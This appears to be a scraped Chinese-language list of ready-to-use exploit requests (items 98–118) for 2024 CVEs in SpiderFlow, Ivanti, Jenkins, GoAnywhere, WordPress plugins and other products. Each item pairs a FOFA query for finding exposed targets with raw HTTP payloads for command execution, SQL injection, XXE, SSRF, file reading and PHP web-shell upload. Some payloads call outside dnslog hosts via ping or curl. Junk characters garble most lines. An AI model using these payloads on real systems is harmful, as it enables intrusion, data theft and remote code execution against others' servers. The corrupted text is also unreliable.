8 h$ @, Y0 d9 P+ E& ?5 v7 P) j) ?4 c' QGET /passport/login/ HTTP/1.1
' b, p- s7 t! S3 ^0 K6 J1 UHost: 192.168.40.130:8085
5 ~* l' S/ f7 d0 y; YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: k9 s  o4 S4 ?! Z8 E; T9 g) Y
Accept-Encoding: gzip
) A$ t2 d! h- m4 {: q( o+ }, WConnection: close9 T5 R, t" Y# V; p! @
Cookie: rememberMe=PAYLOAD
) ^9 Y$ \+ H. G! }* n6 f! z: HX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
5 E9 X) l4 W, Y1 }/ T9 j/ B/ G+ X7 f7 n7 U
  Q1 N3 r  v# [# }" t" x- X) o3 I
98. SpiderFlow爬虫平台远程命令执行
& v! X+ H" }2 `. v, a& _CVE-2024-0195
( F. f3 J* a0 FFOFA:app="SpiderFlow"
% ]6 x5 Q& |( q2 j$ oPOST /function/save HTTP/1.1
' A9 I. u9 C& w3 |; \Host: 192.168.40.130:8088
; X: B- H2 n3 Y* t- f! O: gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' D. |7 ]3 A9 s, j! l$ l6 W
Connection: close
/ t1 ^) o+ Z0 L3 I# h, z& Z2 rContent-Length: 121' y" z5 L) M1 }- S9 f( p
Accept: */*6 d" m! Y5 Y2 h' t
Accept-Encoding: gzip, deflate
5 j0 m0 [1 T. u2 Q/ r9 Q) c" hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 o1 f- h- H! b
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  N9 m( n: R0 [3 }( Q" iX-Requested-With: XMLHttpRequest
, b% |* Y# B/ [  @! c/ K, M. g$ r
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
, D" [, S* t; e; D3 q/ Z0 F& k+ ]2 ~1 J$ N3 R0 t9 ~# l3 M7 ~& k+ E

+ o: t; V# D/ ?! d) l) z1 X4 C# _99. Ncast盈可视高清智能录播系统busiFacade RCE* X+ _0 Q2 o: T. C: N1 g3 [
CVE-2024-0305
7 T- U8 i( o0 H* L- {5 n. h: K2 o" nFOFA:app="Ncast-产品" && title=="高清智能录播系统"
: w; T/ R6 |6 wPOST /classes/common/busiFacade.php HTTP/1.1) p2 S+ R4 ?% `8 ~- Q+ A, o) s
Host: 192.168.40.130:8080
) |0 l9 U6 f7 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0$ Z0 _! L. P% s2 G
Connection: close
. d1 p8 i. |2 z: ?$ W& r; qContent-Length: 154
1 h3 n3 E6 w" |1 WAccept: */** X  a) K7 p. J. P: \8 e) `
Accept-Encoding: gzip, deflate
; h+ \$ x. Y* k* hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- E# Y3 j5 z: K. u' {/ t, S. D) OContent-Type: application/x-www-form-urlencoded; charset=UTF-8
- e9 x" f4 q7 _6 k, N# ~" J; dX-Requested-With: XMLHttpRequest
' E! i1 }! v' b* d3 V8 H; W) @- [
% K# [, M) x% x7 _  ]%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D& R& Q- @) M# x- k* A  `2 Z9 m2 N
% `. s3 v; w& K9 Z' Y7 H
/ r0 A) j6 Z+ C# x9 J8 s- C
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传7 Z; u4 y: u0 ]; W' a& I; E
CVE-2024-0352# q- }0 r& Z- M! e
FOFA:icon_hash="874152924", _9 l" c) h" U3 S
POST /api/file/formimage HTTP/1.1
: P8 N# r( B; g( q0 J+ e) v6 r2 THost: 192.168.40.130
. `: V  x; n9 g8 m  E  k1 tUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36; g! \/ e% U# p2 U
Connection: close
' ]) z8 b  b- b6 W( wContent-Length: 201% Y7 C; R) t0 G4 V& \/ x/ h# M
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei  a7 [; c: _. i, f% A# U% p
Accept-Encoding: gzip2 {5 n4 R* \! W6 k8 L$ |
4 b1 }; P. o6 W$ I8 M% I. |( v
------WebKitFormBoundarygcflwtei
) {, n8 S" |" q) f8 wContent-Disposition: form-data; name="file";filename="IE4MGP.php"
: P+ I4 @" _, G. tContent-Type: application/x-php
, W- x% z8 ]8 `! e. A2 l
# f1 k+ d- V2 R1 {2 T: c2ayyhRXiAsKXL8olvF5s4qqyI2O) \1 W* p$ x8 g. g, F1 i/ {. j
------WebKitFormBoundarygcflwtei--
# y4 X8 @, d: |- |2 f# S
* g3 t1 b  c: O6 G# f1 G% i4 D& m5 H) k, x. l) X% _9 ^# h
101. ivanti policy secure-22.6命令注入
6 f0 \$ ~. f, B0 ~9 `CVE-2024-21887
8 @+ x% I5 h4 k. n  k; ]FOFA:body="welcome.cgi?p=logo"9 q8 o( l+ ~6 ?- M! H. {# L3 t
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.18 d# Z4 k5 V& Y& g
Host: x.x.x.xx.x.x.x4 c9 u7 j; w" l+ I6 ?& i# }/ a* R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 I" l4 T& r  i* aConnection: close
! v' A$ B& I) m" ]9 g/ dAccept-Encoding: gzip% e% A( R7 w5 x% Z" u
2 {- i$ f; [5 s4 |$ Y- ?
  c! y/ _, Z) ~# B" h) W1 W
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行8 v$ L3 {/ u$ k
CVE-2024-21893
/ a/ q5 T8 G  A, F5 I# CFOFA:body="welcome.cgi?p=logo"
0 ]1 F' C* A$ u( A7 X: N" E) zPOST /dana-ws/saml20.ws HTTP/1.17 a% h1 G5 \: f
Host: x.x.x.x6 \, l, H* j" u) ^1 {2 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. j  r# p: h. z7 ~. B5 e" s
Connection: close% O7 \, `# Z5 M  H7 Q
Content-Length: 7924 L* H3 ?- g( V  t
Accept-Encoding: gzip
7 F* {1 ~( n  i. N
) V! B" B2 O1 k' n9 I  u4 h: j<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
' v4 h$ y& @# x3 j  w( h8 z& U4 S. ]0 d
103. Ivanti Pulse Connect Secure VPN XXE
7 a( u5 m0 T' q2 L" W* GCVE-2024-220249 Y/ X  U* P  E0 C8 q: y& x5 T  [
FOFA:body="welcome.cgi?p=logo"
0 d5 T# r9 W) J1 J6 sPOST /dana-na/auth/saml-sso.cgi HTTP/1.1' `, c) G& r1 b; t
Host: 192.168.40.130:111! e9 V$ E7 Q* O9 b- i; j( ?) `
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
) j) J9 l* C9 `5 SConnection: close
" q( N: X9 a  o' mContent-Length: 204
# v2 M5 z! n7 z# \' j1 e4 }$ F+ uContent-Type: application/x-www-form-urlencoded. j3 z- C* ^- V, p2 K9 f4 C: o3 d; h
Accept-Encoding: gzip( ^* F! H* d5 v+ E, [: e

$ s) z9 C/ u+ f2 r$ Y! l3 b/ QSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
+ B9 n2 [& x: b# i- l3 @+ \7 c8 r- u) C$ t$ Y' _5 g& p; f
* ?; X, l, M: ^: r5 L
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
/ z: I, W/ L) x: q: _' }<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>9 L9 @7 x: u9 p8 f7 g' b4 ?) c
7 s2 Y5 i# l+ e* j
8 C" U; D+ M( A+ [/ Q
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露6 l8 c" _2 {3 u) v8 M% d
CVE-2024-0569
& @' k2 K4 u" }# PFOFA:title="TOTOLINK"
5 G& t2 g* ?; L. x6 q' gPOST /cgi-bin/cstecgi.cgi HTTP/1.1
( _) L( @) e" ]& E4 \: RHost:192.168.0.1: g/ J8 o1 P6 _  B- P% q
Content-Length:41
$ c5 n2 {4 @( D8 M2 S% [5 r4 [Accept:application/json,text/javascript,*/*;q=0.01
+ g# b! D4 x0 }+ w2 }) BX-Requested-with: XMLHttpRequest
+ p4 p1 }# d1 }; \User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
$ A3 k! c+ h+ S# n, X* x. H: B1 \Content-Type: application/x-www-form-urlencoded:charset=UTF-8
: F1 n, K. L) }2 T4 u; Z* eOrigin: http://192.168.0.1$ d5 T& k( p  s9 x4 K
Referer: http://192.168.0.1/advance/index.html?time=1671152380564& ~3 ~) Z% T, P" ~
Accept-Encoding:gzip,deflate
. a$ R0 L8 F6 {2 m8 fAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.78 n* e& T9 M8 N4 t. D& a
Connection:close
0 E0 n( H& N& T$ X9 z( j7 g9 a3 S! w2 ^
{7 s/ h5 n* t& ]( m: Y# [: ~
"topicurl":"getSysStatusCfg",8 j* |) }# c' e" C) d
"token":""
$ B) Q: d7 l# ]: o}" D* T! \5 b5 |4 |

- ]% ~1 U$ b4 D/ x105. SpringBlade v3.2.0 export-user SQL 注入* i8 z  J5 R: a( ^4 Y! a/ Q9 t
FOFA:body="https://bladex.vip"
7 n) F4 H8 c- ^: i+ ^4 Y( Fhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
6 q1 [' P3 h4 l8 h' F6 n* A
  X7 Q2 g4 s+ b+ i106. SpringBlade dict-biz/list SQL 注入
5 P) ~$ X3 T" u6 @% _FOFA:body="Saber 将不能正常工作") b; p; _/ E: K' ^& D* A
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1, C3 _, G" z/ s, B& ]$ k9 N8 {! p
Host: your-ip
' t5 E0 n$ B3 I% x  dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 J  O- E4 ?, c' @# J, }
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
& {7 _- l- m$ v! ~Accept-Encoding: gzip, deflate
% C9 i; z) E" c+ @7 N  P+ X- s0 aAccept-Language: zh-CN,zh;q=0.9
( J6 A/ f3 i) r1 P1 v/ X$ HConnection: close
; R4 m( Y0 `! |$ \" R5 m0 ?- }/ i/ h0 x3 E8 b* a
5 f1 I" G" x5 H/ Z" k! p- ~
107. SpringBlade tenant/list SQL 注入
; u) T7 y2 N9 kFOFA:body="https://bladex.vip"
4 P7 b, p2 a: Q- a. xGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1( l! ~4 `2 `8 L! i
Host: your-ip' a$ z! X, ]) z) X6 x. `: h2 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 |8 P4 M$ D& s5 {% p2 {' tBlade-Auth:替换为自己的/ a, s, p( e7 P0 E
Connection: close
" @0 k$ W6 B8 O; g! L% z1 @1 a- v) x* x
" H0 z; R# u) H$ w  b
108. D-Tale 3.9.0 SSRF. l) @  L+ p% ]
CVE-2024-21642& ~$ c4 y( c  I7 c5 z8 Y5 t% b
FOFA:"dtale/static/images/favicon.png"9 S/ {- h/ B+ k, m5 u
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1, k& W1 \; ~( h$ n9 d) M) _# D% C: Q! q% p
Host: your-ip$ ?) s! h7 F7 f! K, B) p* i
Accept: application/json, text/plain, */*3 q$ V; A6 [1 M! Y+ K1 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- k* v' _$ m$ O' z  N
Accept-Encoding: gzip, deflate
! b: u- ~9 y4 Z! n" k# jAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 K  K( ^- k2 _Connection: close& x9 O9 G2 [/ m1 B2 _) e; u
7 g2 i; g" O# I/ O' x3 ^3 {9 r

$ n1 H7 W3 Z) \, \2 C. F9 g109. Jenkins CLI 任意文件读取
1 Y# e2 S; M1 m5 qCVE-2024-23897
  T) J% o' d6 }/ p7 C" @$ gFOFA:header="X-Jenkins"3 v6 q, t& M* Z
POST /cli?remoting=false HTTP/1.1
/ q) H+ R1 E) r3 G0 iHost:
1 n1 Q' n+ K) c8 K+ sContent-type: application/octet-stream
+ v& @# a* l' @Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
  ~9 j" @) U+ b8 bSide: upload1 b3 r$ ^' u2 w* w
Connection: keep-alive
' k3 L  R$ c$ Y7 T# t7 e+ ZContent-Length: 163
- w/ V3 Q2 t- v
1 w0 K& S2 W! Q$ Qb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03') d( F: A' @8 L, q: m! ~2 D
4 M$ x1 `+ J" s) s. B4 l" ]
+ \9 A+ r. r* t) [  W% [$ Z% w3 Z
POST /cli?remoting=false HTTP/1.1
' T* I: P1 D' p' _Host:
% s) S! \/ p- {, gSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e922 T$ i+ ~9 V% v5 w% e: e
download7 K$ ]' l; [! l
Content-Type: application/x-www-form-urlencoded+ w1 @  c$ u: Z: s; |- ]
Content-Length: 0' K' P5 `3 d3 A6 _: Y+ O

3 T# }) S1 |$ n1 @1 l: }; ~2 Y0 @( O% m& S; K0 [
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin3 }2 l  x- h  ^1 g$ [
java -jar jenkins-cli.jar help
! P; |# D# K! \. a* y[COMMAND], U" Q( \0 B8 {  o6 ]" x9 W9 `
Lists all the available commands or a detailed description of single command." r0 c0 m: `5 \  n/ B1 B
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)  w! W9 a% `' X" Y2 T4 D
9 D4 [" `& G+ Z0 L9 }3 j
8 F/ ]4 ]7 `" T3 T
110. Goanywhere MFT 未授权创建管理员
1 R- s8 x3 V, H8 w1 sCVE-2024-0204* u$ e: ], G  A: T
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
( i1 b8 i- U; Q# e$ }7 dGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1# Q/ }. A( k+ g$ R
Host: 192.168.40.130:8000
, I6 k; H$ H  \$ E+ h! o3 _% v  |User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.362 X  G. C. N0 `. L' U
Connection: close* I; A- ~1 e- N8 p' Y( a
Accept: */*1 }5 O8 q# _( u9 O
Accept-Language: en+ C$ V1 A3 t. I, y" V+ |
Accept-Encoding: gzip; a0 b% |/ Q* N& G  o

" H& Q. t9 y- e& ~1 m6 Z/ S$ J/ M; I4 c5 u8 o
111. WordPress Plugin HTML5 Video Player SQL注入
. Z1 a$ }% g5 B* l0 NCVE-2024-1061
+ n$ ~" L) g! `" z3 g' ^5 FFOFA:"wordpress" && body="html5-video-player": E( C3 H0 |9 q7 w
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1% `( B" g7 u3 ^# X
Host: 192.168.40.130:112# n) [% o4 X, U/ y7 ]# N. ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36) P6 t; h( p( q) V6 T! \
Connection: close
5 y+ }3 k+ Q8 b. Y3 E9 yAccept: */*( u$ b2 @" P& l: c
Accept-Language: en# g" |1 i) \% ]7 y4 w7 u
Accept-Encoding: gzip
: S7 Z; x3 {. g7 J  {) t( s4 x
2 @  ?$ j6 c; \# R
& p# M5 N8 K. E7 N6 @112. WordPress Plugin NotificationX SQL 注入
: L/ x- v7 _8 p9 J% @# [; g* WCVE-2024-1698
2 w( u2 I0 p$ v4 zFOFA:body="/wp-content/plugins/notificationx") S: Y: ^  Z! p- [6 H
POST /wp-json/notificationx/v1/analytics HTTP/1.1
3 L8 |/ q5 Z$ I+ D5 W/ NHost: {{Hostname}}
* d5 R: y! N# D! _+ T/ @Content-Type: application/json7 E2 V" s& H, w0 }# ?) h+ u
8 X3 G7 b7 I2 k1 n3 G
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
* {( C5 j( O6 T! F' {  s; C, ?% P
! G  J$ ^0 R& e, `- a; C  |: c# _
113. WordPress Automatic 插件任意文件下载和SSRF
1 a2 v( r. H" J% Z3 H! \7 D9 f7 I& h; [CVE-2024-27954
$ y) U5 \3 d9 \) `1 ]8 `/ oFOFA:"/wp-content/plugins/wp-automatic"  v# g4 m" d$ `1 i
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
+ A) K6 M& P& x& DHost: x.x.x.x
' L8 @7 t7 |0 _/ P) B* N1 uUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
! d& D& y! G0 ^- H1 oConnection: close
' W+ ]1 S0 u) s! D- {Accept: */*
1 Z3 _1 k, `( |0 D' {8 M* JAccept-Language: en
" ~' w9 G9 n# J/ k$ }; l* LAccept-Encoding: gzip
. |. V* D0 _5 V% j
" r0 Y# c, {3 m0 i( c/ j% B& N  P, T+ q
114. WordPress MasterStudy LMS插件 SQL注入
4 W* j( r! v5 n- u# ]FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"( p& ^6 ]3 c2 P* u. z; g* F" X
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
+ i2 H% a# A0 G" E- p: K8 e: Y4 H6 Z. WHost: your-ip) \2 s# Y3 P. N! |! [; x
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. T- s: K1 l! e1 h2 P% U: \
Accept-Charset: utf-8, t; k  M( t- I) a3 \. j
Accept-Encoding: gzip, deflate, P6 k8 x6 \7 U
Connection: close
8 z8 r. p5 N6 `; a, K
1 n. v3 O0 T7 j* i& C7 z- A) M3 E7 r6 J; j4 k$ M
115. WordPress Bricks Builder <= 1.9.6 RCE9 a7 d% U# N1 N" `6 L0 a
CVE-2024-25600. a- ~  O! D, C% X. ?' Q8 ~7 P
FOFA: body="/wp-content/themes/bricks/"7 l6 A# b- Y' G
第一步,获取网站的nonce值
5 |' F: q6 {, @8 k5 O6 ]4 S5 iGET / HTTP/1.1; I7 u6 s3 Z; e$ e9 C1 \' D
Host: x.x.x.x
, ~  c  Z. T) ~0 NUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
+ ?- ^6 I, F  q/ g6 cConnection: close8 T! k: f& c3 J3 `9 k- z( F
Accept-Encoding: gzip
. M" l. E9 f! T$ m  i, S8 y: x: N5 K
% J! K8 n+ e# P/ S7 y0 l( |- P, Y* ~+ A- i7 a4 h
第二步替换nonce值,执行命令
0 [8 K% J6 Q* B9 ~# IPOST /wp-json/bricks/v1/render_element HTTP/1.1
% }& z' T* D  [0 K! ZHost: x.x.x.x* ~5 p, q8 Y1 a9 y: z: c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.369 Y5 x3 {$ d- _, J4 [4 l4 c) i2 l
Connection: close
8 N* X- b: i9 N1 p+ J$ L" HContent-Length: 356
7 b8 }0 F$ z: V$ g2 G. ^Content-Type: application/json
. b  N9 k8 o' p! {" NAccept-Encoding: gzip" z$ i+ V8 S- t* G( {

" t+ j& q8 E2 x* ]1 J; Y& Q" w{+ y$ j0 ^0 m6 N$ R
"postId": "1",/ w2 j. D2 C$ O2 B
  "nonce": "第一步获得的值",
$ c( V& @1 k1 j6 \, S/ W  "element": {
" S! ]4 F  H8 x% c8 F    "name": "container",% ~" X1 Y; U' H5 z$ r
    "settings": {
1 s# q/ J6 S1 C, v9 o; ?% v: i      "hasLoop": "true",! Q2 i1 s/ z- l2 J
      "query": {
) V; B& I- \/ {5 e  V: @6 O        "useQueryEditor": true,$ s4 F# U- ]$ S% a5 b% _
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
0 X& D) w. F) w# V        "objectType": "post"
9 C; `. @6 ^) U4 w5 F! A      }
! @) Y9 m/ q: m* j' y& j0 i! @    }- [/ \. R  x2 B% N/ [
  }$ |& X  {4 O: k8 ?
}4 H. R# x# r* K* S/ A0 ?9 f1 `

8 ]" f8 b) j3 }$ F9 J6 C
- O' t0 L1 e& d" y3 e6 {- P/ g116. wordpress js-support-ticket文件上传
5 f  Y- y, H- o( i' @" q( k1 @) gFOFA:body="wp-content/plugins/js-support-ticket"
1 E3 ]& Y( ^  S4 A9 Q$ `POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.18 r3 W$ c4 {5 q  X# j
Host:
- H! M- y+ X) n2 c$ w  SContent-Type: multipart/form-data; boundary=--------7670991712 ]( M4 H1 p9 |3 O5 ~# a
User-Agent: Mozilla/5.0
% n" {$ _2 I5 a0 j9 X/ \( \( q% L3 R4 Z5 L5 X+ Y, \3 m' c
----------767099171
; p+ j" j/ b1 G; c8 G5 ^' e& FContent-Disposition: form-data; name="action"9 Z! j9 M! ^3 r
configuration_saveconfiguration
" f+ D! X4 Z5 Z/ D----------767099171
! n* I4 w: p& o! q5 W, yContent-Disposition: form-data; name="form_request"! c2 G+ E$ g1 c1 t" B3 P0 B- v+ Q
jssupportticket' \; C7 O0 ^* L: ^! a( Y4 D8 f
----------767099171& S- b2 o4 @1 {5 i! t7 Z; Z! p; C
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php", L& q7 B& S. G) P$ U
Content-Type: image/png* Y. v8 ?- I" {. ]& Z6 V4 j
----------767099171--' ~- ~/ }0 r3 @3 @

- n8 i# l! `9 v/ G1 o1 e
+ }8 E) ~/ |, o- N& U7 @$ ^- W/ Q117. WordPress LayerSlider插件SQL注入
8 x% I- y3 T4 a$ hversion:7.9.11 – 7.10.0
% L! T  S% i- r% P# u  wFOFA:body="/wp-content/plugins/LayerSlider/", @. ^7 ^3 {$ ~* r
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
+ N% z  ]- J1 P7 n2 w. hHost: your-ip* q/ \* p- y" K: h% {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- Z9 b( z8 Q  E& x3 R) n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 W& B1 @3 _6 `; o; |( W+ Y- f( P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, ?& t8 Z# i; |, |* U- I  H+ n
Accept-Encoding: gzip, deflate, br0 T' @* w( W) p1 L6 l
Connection: close
8 n: x/ ^6 P5 D; J, KUpgrade-Insecure-Requests: 1
, K# O0 X$ C8 p9 h4 F( u% p: Y* @& N! C

  s& J, y8 }2 {) @* Q% y& I0 N118. 北京百绰智能S210管理平台uploadfile.php任意文件上传3 e- a+ i0 _7 ~" i( z* k
CVE-2024-09390 T6 H: z. Q% Z' U" Y
FOFA:title="Smart管理平台"' p$ |4 N" z& J; W+ a
POST /Tool/uploadfile.php? HTTP/1.1
) t0 m' x& n& E( zHost: 192.168.40.130:8443
: [3 l  D1 T. _2 `Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
! D0 d- Y/ x% o8 W; lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0$ W8 ]0 P4 \3 d7 _7 Y8 x; T& [& ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 B! @, a. r" g" v# A5 }7 K+ n& \3 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* w  h: a5 O+ z3 T  G& M
Accept-Encoding: gzip, deflate
9 @/ O+ m) k* FContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
7 |6 Y$ _+ X$ H' IContent-Length: 405
- k* g. B+ e6 _6 D7 n* t2 \Origin: https://192.168.40.130:8443) U3 _3 H, N+ V( y( H% j* @/ w% \
Referer: https://192.168.40.130:8443/Tool/uploadfile.php& S4 t/ O" {1 m. J
Upgrade-Insecure-Requests: 1
2 p# N" q7 R& \, JSec-Fetch-Dest: document
2 m, a' x- N1 |Sec-Fetch-Mode: navigate
) Q9 a+ Z% U# T! USec-Fetch-Site: same-origin
6 M0 H( x+ C* e9 S2 O5 c( DSec-Fetch-User: ?1! ?6 j3 I+ U! h& o, ~) W3 G5 F$ G
Te: trailers: R+ F; i; Z1 K) I, k9 ^) u+ h
Connection: close. b0 i# i6 S8 y, O  c7 @/ K
% `  H5 a  n2 H( C
-----------------------------13979701222747646634037182887
2 ?5 R, b2 j. u9 T7 L3 LContent-Disposition: form-data; name="file_upload"; filename="contents.php"
* f! t0 Z+ D3 a4 k; y# n- T# ]Content-Type: application/octet-stream
5 Z% [' l0 q. T1 R& w) S( A0 k9 {
) v4 ~) _( ~! h/ w2 T<?php
; F( ~% K/ y7 \3 [8 Q& Nsystem($_POST["passwd"]);1 |2 q( ]. G3 g) B/ a  m8 g9 l
?>* ?: L% j4 G% p, v0 E
-----------------------------13979701222747646634037182887$ U. m. \  r9 c, u
Content-Disposition: form-data; name="txt_path", }3 K4 j5 C- h4 S! X3 _' B" H: k

0 ?, E' r) A0 |* P/ A8 q/home/src.php
